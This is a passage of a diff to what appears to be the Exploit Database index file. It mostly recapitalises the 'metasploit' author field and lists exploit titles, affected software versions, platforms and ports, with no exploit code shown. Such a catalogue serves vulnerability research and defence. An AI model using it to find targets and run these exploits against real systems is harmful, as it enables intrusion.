(1)",2013-08-08,Metasploit,hardware,remote,0 +27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,Metasploit,windows,remote,0 +27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 - (build3) Multiple SQL Injection Vulnerabilities",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 Month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 @@ -24628,9 +24628,9 @@ id,file,description,date,author,platform,type,port 27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 BVF File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps,0 27525,platforms/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 27526,platforms/windows/remote/27526.txt,"Oracle Java storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0 -27527,platforms/multiple/remote/27527.rb,"Ruby on Rails Known Secret Session Cookie Remote Code Execution",2013-08-12,metasploit,multiple,remote,0 -27529,platforms/php/remote/27529.rb,"OpenX Backdoor PHP Code Execution",2013-08-12,metasploit,php,remote,0 -27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,metasploit,multiple,remote,0 +27527,platforms/multiple/remote/27527.rb,"Ruby on Rails Known Secret Session Cookie Remote Code Execution",2013-08-12,Metasploit,multiple,remote,0 +27529,platforms/php/remote/27529.rb,"OpenX Backdoor PHP Code Execution",2013-08-12,Metasploit,php,remote,0 +27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,Metasploit,multiple,remote,0 27531,platforms/php/webapps/27531.txt,"WordPress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.php Remote File Include",2006-03-30,"Morocco Security Team",php,webapps,0 @@ -24652,8 +24652,8 @@ id,file,description,date,author,platform,type,port 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - Admin_Login.ASP SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 27554,platforms/windows/remote/27554.py,"MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 -27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",2013-08-13,metasploit,windows,remote,13838 -27556,platforms/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload",2013-08-13,metasploit,windows,remote,8080 +27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",2013-08-13,Metasploit,windows,remote,13838 +27556,platforms/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload",2013-08-13,Metasploit,windows,remote,8080 27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 query.jsp msg Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 edit.jsp Multiple Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - visview.php _GET['cid'] Parameter SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24701,11 +24701,11 @@ id,file,description,date,author,platform,type,port 27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps,0 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 -27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,metasploit,windows,remote,80 -27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,metasploit,windows,remote,8000 -27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow",2013-08-15,metasploit,windows,remote,80 -27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,metasploit,windows,local,0 -27610,platforms/php/remote/27610.rb,"Joomla Media Manager File Upload",2013-08-15,metasploit,php,remote,80 +27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,Metasploit,windows,remote,80 +27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,Metasploit,windows,remote,8000 +27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow",2013-08-15,Metasploit,windows,remote,80 +27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow",2013-08-15,Metasploit,windows,local,0 +27610,platforms/php/remote/27610.rb,"Joomla Media Manager File Upload",2013-08-15,Metasploit,php,remote,80 27611,platforms/windows/remote/27611.txt,"Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote,0 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 login.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 index.php Multiple Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 @@ -24810,8 +24810,8 @@ id,file,description,date,author,platform,type,port 27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter XSS",2006-06-05,Luny,php,webapps,0 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 index.php catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 27703,platforms/windows/remote/27703.py,"PCMAN FTP 2.07 - STOR Command Buffer Overflow Exploit",2013-08-19,Polunchis,windows,remote,0 -27704,platforms/windows/remote/27704.rb,"Cogent DataHub HTTP Server Buffer Overflow",2013-08-19,metasploit,windows,remote,0 -27705,platforms/multiple/remote/27705.rb,"Java storeImageArray() Invalid Array Indexing",2013-08-19,metasploit,multiple,remote,0 +27704,platforms/windows/remote/27704.rb,"Cogent DataHub HTTP Server Buffer Overflow",2013-08-19,Metasploit,windows,remote,0 +27705,platforms/multiple/remote/27705.rb,"Java storeImageArray() Invalid Array Indexing",2013-08-19,Metasploit,multiple,remote,0 27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 28694,platforms/php/webapps/28694.txt,"VBulletin 2.3.x Global.php SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - Index.php Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 @@ -24851,7 +24851,7 @@ id,file,description,date,author,platform,type,port 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel gate2.php - Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 -27752,platforms/unix/remote/27752.rb,"Graphite Web Unsafe Pickle Handling",2013-08-21,metasploit,unix,remote,0 +27752,platforms/unix/remote/27752.rb,"Graphite Web Unsafe Pickle Handling",2013-08-21,Metasploit,unix,remote,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 27754,platforms/windows/remote/27754.txt,"Oracle Java BytePackedRaster.verify() Signed Integer Overflow",2013-08-21,"Packet Storm",windows,remote,0 27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 @@ -24877,7 +24877,7 @@ id,file,description,date,author,platform,type,port 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0 -27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,metasploit,linux,webapps,443 +27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139 27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x Addentry.php Remote File Include",2006-04-29,[Oo],php,webapps,0 @@ -24974,7 +24974,7 @@ id,file,description,date,author,platform,type,port 27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 27875,platforms/linux/dos/27875.c,"libtiff <= 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0 27876,platforms/php/webapps/27876.txt,"Musicbox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 -27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,metasploit,windows,remote,7770 +27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,Metasploit,windows,remote,7770 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! VirtueMart Component 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 Popup.php Local File Include",2006-05-15,Mr.CrackerZ,php,webapps,0 @@ -25037,13 +25037,13 @@ id,file,description,date,author,platform,type,port 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Include",2006-08-16,O.U.T.L.A.W,php,webapps,0 -27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0 -27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,metasploit,windows,remote,0 -27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,metasploit,windows,remote,0 -27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0 +27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 +27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 +27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0 +27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 -27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,metasploit,osx,local,0 +27944,platforms/osx/local/27944.rb,"Mac OS X - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 @@ -25146,8 +25146,8 @@ id,file,description,date,author,platform,type,port 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - (.wav) Crash PoC",2013-09-04,ariarat,windows,dos,0 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 -28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,metasploit,windows,remote,0 -28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0 +28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 +28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,Metasploit,windows,remote,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 28087,platforms/windows/dos/28087.txt,"Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness",2006-06-22,"Debasis Mohanty",windows,dos,0 28088,platforms/php/webapps/28088.txt,"PHP Event Calendar 4.2 - SQL Injection",2006-06-22,Silitix,php,webapps,0 @@ -25190,7 +25190,7 @@ id,file,description,date,author,platform,type,port 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon (video.php value param) - SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Auth Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 -28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",2013-09-06,metasploit,windows,local,0 +28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",2013-09-06,Metasploit,windows,local,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 Index.php Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO index.php Multiple Parameter XSS",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO index.php Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 @@ -25246,8 +25246,8 @@ id,file,description,date,author,platform,type,port 28184,platforms/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",hardware,webapps,0 28185,platforms/php/webapps/28185.txt,"glFusion 1.3.0 (search.php cat_id param) - SQL Injection",2013-09-10,"Omar Kurt",php,webapps,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 -28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,metasploit,windows,remote,0 -28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,metasploit,windows,remote,8080 +28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 +28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 28190,platforms/php/webapps/28190.txt,"ExtCalendar 2.0 ExtCalendar.php Remote File Include",2006-07-07,Matdhule,php,webapps,0 28191,platforms/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",php,webapps,0 @@ -25385,12 +25385,12 @@ id,file,description,date,author,platform,type,port 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28331,platforms/windows/remote/28331.txt,"Oracle Java ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0 -28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0 -28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,metasploit,unix,remote,49152 -28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,metasploit,linux,remote,443 -28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,metasploit,windows,local,0 -28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",2013-09-17,metasploit,windows,remote,443 -28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,metasploit,windows,remote,443 +28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Local Privilege Escalation",2013-09-17,Metasploit,linux,local,0 +28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152 +28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 +28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0 +28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 +28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 28340,platforms/multiple/webapps/28340.c,"PSWD.JS Insecure Password Hash Weakness",2006-08-03,"Gianstefano Monni",multiple,webapps,0 @@ -25428,7 +25428,7 @@ id,file,description,date,author,platform,type,port 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 Image Parameter Multiple Remote File Include Vulnerabilities",2006-08-10,x0r0n,php,webapps,0 28373,platforms/windows/remote/28373.txt,"Panda ActiveScan 5.53 Ascan_6.ASP ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote,0 28374,platforms/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote,0 -28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 +28375,platforms/windows/dos/28375.pl,"TeraCopy 2.3 - (default.mo) Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos,0 28376,platforms/windows/remote/28376.html,"McKesson ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 Fname Remote File Include",2006-08-10,sh3ll,php,webapps,0 @@ -25527,11 +25527,11 @@ id,file,description,date,author,platform,type,port 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 IBrowser Remote File Include",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 -28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (2)",2013-09-23,metasploit,windows,remote,6502 -28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,metasploit,windows,remote,0 -28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,metasploit,windows,remote,0 -28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,metasploit,php,remote,80 -28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,metasploit,hardware,remote,0 +28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502 +28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,Metasploit,windows,remote,0 +28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0 +28483,platforms/php/remote/28483.rb,"GLPI install.php Remote Command Execution",2013-09-23,Metasploit,php,remote,80 +28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,Metasploit,hardware,remote,0 28485,platforms/php/webapps/28485.txt,"WordPress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 ADODB_DIR.php Remote File Include",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 @@ -25555,7 +25555,7 @@ id,file,description,date,author,platform,type,port 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 QB_Path Parameter Multiple Remote File Include Vulnerabilities",2006-12-27,Shell,php,webapps,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Local Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 -28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices Unauthenticated Remote Command Execution",2013-09-24,metasploit,hardware,remote,0 +28508,platforms/hardware/remote/28508.rb,"Raidsonic NAS Devices Unauthenticated Remote Command Execution",2013-09-24,Metasploit,hardware,remote,0 28510,platforms/php/webapps/28510.txt,"PHProg 1.0 index.php album Parameter XSS",2006-09-11,cdg393,php,webapps,0 28511,platforms/php/webapps/28511.txt,"PHProg 1.0 index.php lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 28512,platforms/windows/remote/28512.txt,"paul smith computer services vcap calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",windows,remote,0 @@ -25702,11 +25702,11 @@ id,file,description,date,author,platform,type,port 28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x /admin/print_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 +28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - /admin/print_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - CSRF",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 (lang.php WriteIntoLocalDisk method) - Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 -28655,platforms/multiple/local/28655.rb,"Nodejs js-yaml load() Code Exec",2013-09-30,metasploit,multiple,local,0 +28655,platforms/multiple/local/28655.rb,"Nodejs js-yaml load() Code Exec",2013-09-30,Metasploit,multiple,local,0 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28657,platforms/linux/local/28657.c,"glibc and eglibc 2.5/2.7/2.13 - Buffer Overflow",2013-09-30,"Hector Marco and Ismael Ripoll",linux,local,0 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 Media.php Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 @@ -25729,8 +25729,8 @@ id,file,description,date,author,platform,type,port 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0 28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 28680,platforms/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",linux,local,0 -28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,metasploit,windows,remote,21 -28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer SetMouseCapture Use-After-Free",2013-10-02,metasploit,windows,remote,0 +28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,Metasploit,windows,remote,21 +28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer SetMouseCapture Use-After-Free",2013-10-02,Metasploit,windows,remote,0 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 @@ -25742,10 +25742,10 @@ id,file,description,date,author,platform,type,port 28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Include",2006-09-25,You_You,php,webapps,0 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS index.php Multiple Parameter XSS",2006-09-26,Root3r_H3ll,php,webapps,0 28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS modules/pageedit/index.php pageid Parameter XSS",2006-09-26,Root3r_H3ll,php,webapps,0 -28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x /admin/nav.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 -28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x /admin/image.php image Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 -28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x /admin/header.inc.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 -28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x /footer.inc.php la_pow_by Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 